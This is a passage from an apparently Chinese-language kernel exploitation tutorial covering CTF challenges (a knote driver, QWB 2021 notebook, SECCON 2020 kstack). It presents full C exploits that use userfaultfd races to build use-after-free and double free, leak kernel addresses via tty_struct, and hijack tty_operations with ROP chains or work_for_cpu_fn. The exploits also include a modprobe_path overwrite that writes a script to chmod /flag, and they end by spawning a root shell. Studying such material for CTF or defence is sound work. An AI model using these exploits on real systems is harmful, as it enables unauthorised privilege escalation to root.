    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }
    static pthread_t monitor_thread;
    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

typedef struct {
    union {
        size_t size;
        size_t index;
    };
    char *buf;
} Chunk;
long knote_fd;

void chunk_add(size_t size) {
    Chunk chunk = {.size=size};
    ioctl((int) knote_fd, 0x1337, &chunk);
}

void chunk_edit(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x8888, &chunk);
}

void chunk_get(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x2333, &chunk);
}

void chunk_del(size_t index) {
    Chunk chunk = {.index=index};
    ioctl((int) knote_fd, 0x6666, &chunk);
}

void leak_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        chunk_del(0);
        for (int i = 0; i < 100; i++) {
            open("/dev/ptmx", O_RDWR);
        }

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.src: %p\n", uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

void uaf_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        chunk_del(0);
        memcpy(page, &modprobe_path, 8);

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.src: %p\n", uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

int main() {
    bind_core(0);
    page_size = getpagesize();
    page = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    knote_fd = open("/dev/knote", O_RDWR);
    if (knote_fd < 0) {
        puts("[-] Failed to open knote.");
        exit(-1);
    }

    FILE *offset_fd = fopen("/offset", "r");
    size_t kernel_offset;
    if (offset_fd != NULL) {
        fscanf(offset_fd, "%llx", &kernel_offset);
        fclose(offset_fd);
    } else {
        char *buf = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        register_userfaultfd(buf, page_size, (void *) leak_thread);
        chunk_add(TTY_STRUCT_SIZE);
        chunk_get(0, buf);
        qword_dump("leak tty_struct",buf,TTY_STRUCT_SIZE);
        if (((size_t *) buf)[86]) {
            puts("[+] Successfully hit the tty_struct.");
            kernel_offset = ((size_t *) buf)[86] - 0xffffffff815d4ef0;
            offset_fd = fopen("/offset", "w");
            fprintf(offset_fd, "%llx", kernel_offset);
            fclose(offset_fd);
        } else {
            puts("[-] Failed to hit the tty struct.");
            exit(-1);
        }
    }
    modprobe_path += kernel_offset;
    printf("[*] kernel offset: %p\n", kernel_offset);
    printf("[*] modprobe_path: %p\n", modprobe_path);

    chunk_add(0x100);
    char *buf = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(buf, page_size, (void *) uaf_thread);
    chunk_edit(0, buf);
    chunk_add(0x100);
    chunk_add(0x100);
    chunk_edit(1, "/shell.sh");
    if (open("/shell.sh", O_RDWR) < 0) {
        system("echo '#!/bin/sh' >> /shell.sh");
        system("echo 'chmod 777 /flag' >> /shell.sh");
        system("chmod +x /shell.sh");
    }
    system("echo -e '\\xff\\xff\\xff\\xff' > /fake");
    system("chmod +x /fake");
    system("/fake");
    if (open("/flag", O_RDWR) < 0) {
        puts("[-] Failed to hijack!");
        _exit(-1);
    }
    puts("[+] hijack success");
    system("/bin/sh");

    return 0;
}

例题：强网杯2021 notebook

附件下载链接
题目中的 notedel 加了写锁，noteadd，noteedit 加了读锁。读锁可以被多个进程使用，多个进程此时可以同时进入临界区，而写锁只能被一个进程使用，只有一个进程能够进入临界区，因此只能考虑读锁的功能。

noteedit 函数功能如下：

__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
  __int64 v3; // rdx
  __int64 v4; // r13
  note *note; // rbx
  size_t size; // rax
  __int64 v7; // r12
  __int64 v8; // rbx

  _fentry__(idx);
  if ( idx > 0xF )
  {
    v8 = -1LL;
    printk("[x] Edit idx out of range.\n", newsize);
    return v8;
  }
  v4 = v3;
  note = &notebook[idx];
  raw_read_lock(&lock);
  size = note->size;
  note->size = newsize;
  if ( size == newsize )
  {
    v8 = 1LL;
    goto editout;
  }
  v7 = krealloc(note->note, newsize, 0x24000C0LL);
  copy_from_user(name, v4, 0x100LL);
  if ( !note->size )
  {
    printk("free in fact");
    note->note = 0LL;
    v8 = 0LL;
    goto editout;
  }
  if ( (unsigned __int8)_virt_addr_valid(v7) )
  {
    note->note = (void *)v7;
    v8 = 2LL;
editout:
    raw_read_unlock(&lock);
    printk("[o] Edit success. %s edit a note.\n", name);
    return v8;
  }
  printk("[x] Return ptr unvalid.\n");
  raw_read_unlock(&lock);
  return 3LL;
}

可以看到 editnote 实际上是利用 krealloc 改变 note 的大小。krealloc 有如下特性：

krealloc 的 new_size<ks ，则指针不变，仅调整kasan监控的区域。
krealloc 的 new_size>ks ，则 kfree 释放原本 object ，kmalloc 重新申请新 object 。

由于 editnote 是先 realloc 再 copy_from_user 再更新 note 指针，因此可以考虑利用 userfaultfd 实现 UAF 。

在释放利用 editnote 释放 object 后可以大量申请 tty_struct 来泄露内核基址。由于 notegift 可以泄露 object 地址，因此可以伪造 tty_operations 来劫持内核执行流程。

劫持内核执行流程后有 ROP 和 work_for_cpu_fn 两种方法提权。

ROP 方式是在 tty_operations 中写入如下 gadget，由于调用 tty_operations 中的函数时会传入 tty_struct 结构体地址，因此可以将栈迁移至 tty_struct 。

.text:FFFFFFFF81238D50 push    rdi
.text:FFFFFFFF81238D51 pop     rsp
.text:FFFFFFFF81238D52 pop     rbp
.text:FFFFFFFF81238D53 add     rax, rdx
.text:FFFFFFFF81238D56 retn

为了不破坏 tty_struct 结构，不能再 tty_struct 布置完整的 rop 而是在 tty_struct 对应位置写入 pop rsp; ret gadget 将栈迁移至一个 note 中，在 note 中写入 rop 完成提权。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

const int TTY_STRUCT_SIZE = 0x2E0;
const int PTMX_NUM = 100;
size_t commit_creds = 0xFFFFFFFF810A9B40;
size_t init_cred = 0xFFFFFFFF8225C940;
size_t mov_rsp_rdi_ret = 0xffffffff81238d50;
size_t pop_rdi_ret = 0xffffffff81007115;
size_t pop_rsp_ret = 0xffffffff810bc110;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A00929;


struct tty_operations {
    struct tty_struct *(*lookup)(struct tty_driver *driver, struct file *filp, int idx);

    int (*install)(struct tty_driver *driver, struct tty_struct *tty);

    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);

    int (*open)(struct tty_struct *tty, struct file *filp);

    void (*close)(struct tty_struct *tty, struct file *filp);

    void (*shutdown)(struct tty_struct *tty);

    void (*cleanup)(struct tty_struct *tty);

    int (*write)(struct tty_struct *tty, const unsigned char *buf, int count);

    int (*put_char)(struct tty_struct *tty, unsigned char ch);

    void (*flush_chars)(struct tty_struct *tty);

    int (*write_room)(struct tty_struct *tty);

    int (*chars_in_buffer)(struct tty_struct *tty);

    int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    long (*compat_ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    void (*set_termios)(struct tty_struct *tty, struct ktermios *old);

    void (*throttle)(struct tty_struct *tty);

    void (*unthrottle)(struct tty_struct *tty);

    void (*stop)(struct tty_struct *tty);

    void (*start)(struct tty_struct *tty);

    void (*hangup)(struct tty_struct *tty);

    int (*break_ctl)(struct tty_struct *tty, int state);

    void (*flush_buffer)(struct tty_struct *tty);

    void (*set_ldisc)(struct tty_struct *tty);

    void (*wait_until_sent)(struct tty_struct *tty, int timeout);

    void (*send_xchar)(struct tty_struct *tty, char ch);

    int (*tiocmget)(struct tty_struct *tty);

    int (*tiocmset)(struct tty_struct *tty, unsigned int set, unsigned int clear);

    int (*resize)(struct tty_struct *tty, struct winsize *ws);

    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);

    int (*get_icount)(struct tty_struct *tty, struct serial_icounter_struct *icount);

    const struct file_operations *proc_fops;
};

void get_shell() { system("/bin/sh"); }

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}


void bind_core(int core) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

size_t *page;
long page_size;

void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }
    struct uffdio_api uffdio_api = {.api=UFFD_API, .features=0};
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (size_t) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }
    static pthread_t monitor_thread;
    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

struct Note {
    size_t index;
    size_t size;
    char *buf;
};

int note_fd;

void note_add(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x100, &(struct Note) {index, size, buf});
}

void note_del(size_t index) {
    ioctl(note_fd, 0x200, &(struct Note) {.index=index});
}

void note_edit(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x300, &(struct Note) {index, size, buf});
}

void note_gift(void *buf) {
    ioctl(note_fd, 100, &(struct Note) {.buf=buf});
}

size_t note_read(int index, void *buf) {
    return read(note_fd, buf, index);
}

size_t note_write(int index, void *buf) {
    return write(note_fd, buf, index);
}

void uaf_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        int ptmx_fd[PTMX_NUM];
        for (int i = 0; i < PTMX_NUM; i++) {
            ptmx_fd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        }
        note_edit(0, 1024, page);
        note_read(0, page);
        qword_dump("leak tty_struct", page, 1024);

        size_t offset = page[3] - 0xffffffff81e8e440;
        commit_creds += offset;
        init_cred += offset;
        mov_rsp_rdi_ret += offset;
        pop_rdi_ret += offset;
        pop_rsp_ret += offset;
        swapgs_restore_regs_and_return_to_usermode += offset;

        struct tty_operations tty_ops;
        for (int i = 0; i < sizeof(tty_ops) / sizeof(size_t); i++) {
            ((size_t *) &tty_ops)[i] = mov_rsp_rdi_ret;
        }

        size_t rop[] = {
                pop_rdi_ret,
                init_cred,
                commit_creds,
                swapgs_restore_regs_and_return_to_usermode + 0x16,
                0,
                0,
                (size_t) get_shell,
                user_cs,
                user_rflags,
                user_sp,
                user_ss
        };

        int buf_size = sizeof(tty_ops) + sizeof(rop);
        char buf[buf_size];
        memcpy(buf, &tty_ops, sizeof(tty_ops));
        memcpy(buf + sizeof(tty_ops), rop, sizeof(rop));

        note_add(1, 0x50, page);
        note_edit(1, buf_size, page);
        note_write(1, buf);

        size_t notebook[32];
        note_gift(notebook);
        qword_dump("notebook", notebook, 32 * 8);
        size_t tty_ops_addr = notebook[2];
        size_t rop_addr = tty_ops_addr + sizeof(struct tty_operations);
        size_t tty_struct_addr = notebook[0];
        printf("[*] tty_ops addr: %p\n", tty_ops_addr);
        printf("[*] tty_struct addr: %p\n", tty_struct_addr);
        printf("[*] rop addr: %p\n", rop_addr);

        page[1] = pop_rsp_ret;
        page[2] = rop_addr;
        page[3] = tty_ops_addr;
        note_write(0, page);

        for (int i = 0; i < PTMX_NUM; i++) {
            ioctl(ptmx_fd[i], 0x1145141919810);
        }

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.src: %p\n", uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

int main() {
    save_status();
    bind_core(0);

    page_size = getpagesize();
    page = (size_t *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    memset(page, 0, page_size);

    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0) {
        puts("[-] Failed to open notebook.");
        exit(-1);
    }
    note_add(0, 0x50, page);
    note_edit(0, TTY_STRUCT_SIZE, page);

    char *buf = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(buf, page_size, (void *) uaf_thread);
    note_edit(0, 0x2000, buf);

    return 0;
}

在开启了多核支持的内核中都有 work_for_cpu 这个函数。

struct work_for_cpu {
    struct work_struct work;
    long (*fn)(void *);
    void *arg;
    long ret;
};

static void work_for_cpu_fn(struct work_struct *work)
{
    struct work_for_cpu *wfc = container_of(work, struct work_for_cpu, work);

    wfc->ret = wfc->fn(wfc->arg);
}

在 IDA 中 work_for_cpu 这个函数内容如下：

void __fastcall work_for_cpu_fn(size_t *args)
{
  _fentry__(args);
  args[6] = ((__int64 (__fastcall *)(size_t))args[4])(args[5]);
}

因此只需要在 tty_operations 中写入 work_for_cpu_fn 函数指针，利用调用 tty_operations 中的函数时会传入 tty_struct 结构体地址这个特性在 tty_struct 对应位置写入要执行的函数和参数实现提权。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

const int TTY_STRUCT_SIZE = 0x2E0;
const int PTMX_NUM = 100;
size_t commit_creds = 0xFFFFFFFF810A9B40;
size_t prepare_kernel_cred = 0xFFFFFFFF810A9EF0;
size_t init_cred = 0xFFFFFFFF8225C940;
size_t work_for_cpu_fn = 0xFFFFFFFF8109EB90;

struct tty_operations {
    struct tty_struct *(*lookup)(struct tty_driver *driver, struct file *filp, int idx);

    int (*install)(struct tty_driver *driver, struct tty_struct *tty);

    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);

    int (*open)(struct tty_struct *tty, struct file *filp);

    void (*close)(struct tty_struct *tty, struct file *filp);

    void (*shutdown)(struct tty_struct *tty);

    void (*cleanup)(struct tty_struct *tty);

    int (*write)(struct tty_struct *tty, const unsigned char *buf, int count);

    int (*put_char)(struct tty_struct *tty, unsigned char ch);

    void (*flush_chars)(struct tty_struct *tty);

    int (*write_room)(struct tty_struct *tty);

    int (*chars_in_buffer)(struct tty_struct *tty);

    int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    long (*compat_ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    void (*set_termios)(struct tty_struct *tty, struct ktermios *old);

    void (*throttle)(struct tty_struct *tty);

    void (*unthrottle)(struct tty_struct *tty);

    void (*stop)(struct tty_struct *tty);

    void (*start)(struct tty_struct *tty);

    void (*hangup)(struct tty_struct *tty);

    int (*break_ctl)(struct tty_struct *tty, int state);

    void (*flush_buffer)(struct tty_struct *tty);

    void (*set_ldisc)(struct tty_struct *tty);

    void (*wait_until_sent)(struct tty_struct *tty, int timeout);

    void (*send_xchar)(struct tty_struct *tty, char ch);

    int (*tiocmget)(struct tty_struct *tty);

    int (*tiocmset)(struct tty_struct *tty, unsigned int set, unsigned int clear);

    int (*resize)(struct tty_struct *tty, struct winsize *ws);

    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);

    int (*get_icount)(struct tty_struct *tty, struct serial_icounter_struct *icount);

    const struct file_operations *proc_fops;
};

void bind_core(int core) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

size_t *page;
long page_size;

void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }
    struct uffdio_api uffdio_api = {.api=UFFD_API, .features=0};
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (size_t) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }
    static pthread_t monitor_thread;
    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

struct Note {
    size_t index;
    size_t size;
    char *buf;
};

int note_fd;

void note_add(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x100, &(struct Note) {index, size, buf});
}

void note_del(size_t index) {
    ioctl(note_fd, 0x200, &(struct Note) {.index=index});
}

void note_edit(size_t index, size_t size, void *buf) {
    ioctl(note_fd, 0x300, &(struct Note) {index, size, buf});
}

void note_gift(void *buf) {
    ioctl(note_fd, 100, &(struct Note) {.buf=buf});
}

size_t note_read(int index, void *buf) {
    return read(note_fd, buf, index);
}

size_t note_write(int index, void *buf) {
    return write(note_fd, buf, index);
}

void uaf_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        int ptmx_fd[PTMX_NUM];
        for (int i = 0; i < PTMX_NUM; i++) {
            ptmx_fd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        }
        note_edit(0, 1024, page);
        note_read(0, page);
        qword_dump("leak tty_struct", page, 1024);

        size_t offset = page[3] - 0xffffffff81e8e440;
        commit_creds += offset;
        prepare_kernel_cred += offset;
        init_cred += offset;
        work_for_cpu_fn += offset;

        struct tty_operations tty_ops;
        for (int i = 0; i < sizeof(tty_ops) / sizeof(size_t); i++) {
            ((size_t *) &tty_ops)[i] = work_for_cpu_fn;
        }
        note_add(1, 0x50, page);
        note_edit(1, sizeof(tty_ops), page);
        note_write(1, &tty_ops);

        size_t notebook[32];
        note_gift(notebook);
        qword_dump("notebook", notebook, 32 * 8);
        size_t tty_ops_addr = notebook[2];
        size_t tty_struct_addr = notebook[0];
        printf("[*] tty_ops addr: %p\n", tty_ops_addr);
        printf("[*] tty_struct addr: %p\n", tty_struct_addr);

        page[4] = prepare_kernel_cred;
        page[5] = 0;
        page[3] = tty_ops_addr;
        note_write(0, page);
        for (int i = 0; i < PTMX_NUM; i++) {
            ioctl(ptmx_fd[i], 0x1145141919810);
        }

        note_read(0, page);
        page[4] = commit_creds;
        page[5] = page[6];
        note_write(0, page);
        for (int i = 0; i < PTMX_NUM; i++) {
            ioctl(ptmx_fd[i], 0x1145141919810);
        }

//        page[4] = commit_creds;
//        page[5] = init_cred;
//        page[3] = tty_ops_addr;
//        note_write(0, page);
//        for (int i = 0; i < PTMX_NUM; i++) {
//            ioctl(ptmx_fd[i], 0x1145141919810);
//        }

        system("/bin/sh");

        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.src: %p\n", uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

int main() {
    bind_core(0);

    page_size = getpagesize();
    page = (size_t *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    memset(page, 0, page_size);

    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0) {
        puts("[-] Failed to open notebook.");
        exit(-1);
    }

    note_add(0, 0x50, page);
    note_edit(0, TTY_STRUCT_SIZE, page);

    char *buf = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(buf, page_size, (void *) uaf_thread);
    note_edit(0, 0x2000, buf);

    return 0;
}

setxattr + userfaultfd 堆占位技术

我们通过 mmap 分配连续的两个页面，在第二个页面上启用 userfaultfd，并在第一个页面的末尾写入我们想要的数据，此时我们调用 setxattr 进行跨页面的拷贝，当 copy_from_user 拷贝到第二个页面时便会触发 userfaultfd，从而让 setxattr 的执行流程卡在此处，这样这个 object 就不会被释放掉，而是可以继续参与我们接下来的利用。

例题：SECCON 2020 kstack

附件下载链接
驱动维护一个内存块构成的链表。
内存块大小为 32 字节。

1	element = (_Element *)kmem_cache_alloc(kmalloc_caches[5], 0x6000C0LL)

链表结构如下图所示。

主要有 add 和 del 两个功能。
这里注意到 add 功能是先将申请的内存块添加到链表中，然后再 copy_from_user 写入内容；而 del 功能是先找到要删除的内存块 copy_to_user 将内容复制出来再将其从链表中取出并释放掉。
也就是说当无论是 copy_from_user 还是 copy_to_user ，要操作的内存块依旧在链表中，此时借助 userfaultfd 可以再次对其进行 del 操作从而构造出 uaf 和 double free 。
因此漏洞利用思路如下：

泄露内核地址
首先申请一个 seq_operations 并将其释放，然后 add 将这个释放的 seq_operations 申请出来，在 copy_from_user 处通过 userfaultfd 利用 del 删掉加入链表中的内存块其中 del 的 copy_to_user 泄露出内核地址。
构造 double free
add 一个内存块然后将其 del ，在 copy_to_user 处通过 userfaultfd 利用 del 将其释放，userfaultfd 完成缺页处理后再次释放造成 double free 。
setxattr + userfaultfd 堆占位提权
构造 double free 之后先是申请 seq_operations ，之后再 setxattr 申请同一个内存块。利用 userfaultfd 编辑 seq_operations 修改 start 函数指针为指向 add rsp val; gadget 将栈迁移到 pt_regs 结构体上提前布置好的 ROP 上完成提权。

这里需要注意的一点是，前面 double free 的内存块申请出来后，freelist 已经被破坏，直接获取 shell 会造成 kernel panic ，因此需要先释放之前申请的一些内存块来供后面的使用。
另外 userfaultf 处理完缺页错误之后最好 return 结束循环处理，不然会出现一些奇怪的问题，比如泄露内核地址没及时 return 会造成 double free 的内存块再第二次申请时申请不出来。

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <linux/userfaultfd.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
#include <stdbool.h>
#include <sys/xattr.h>

size_t prepare_kernel_cred = 0xffffffff81069e00;
size_t commit_creds = 0xffffffff81069c10;
size_t pop_rdi_ret = 0xffffffff81034505;
size_t mov_rdi_rax_pop_rbp_ret = 0xffffffff8102d5ce;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81600a34;

void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

int dev_fd;

void add(void *a) {
    if (ioctl(dev_fd, 0x57AC0001, a) < 0) {
        puts("[-] add error");
        exit(-1);
    }
}

void del(void *a) {
    if (ioctl(dev_fd, 0x57AC0002, a) < 0) {
        puts("[-] del error");
        exit(-1);
    }
}

char *page;
size_t page_size;
size_t kernel_offset;

void leak_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
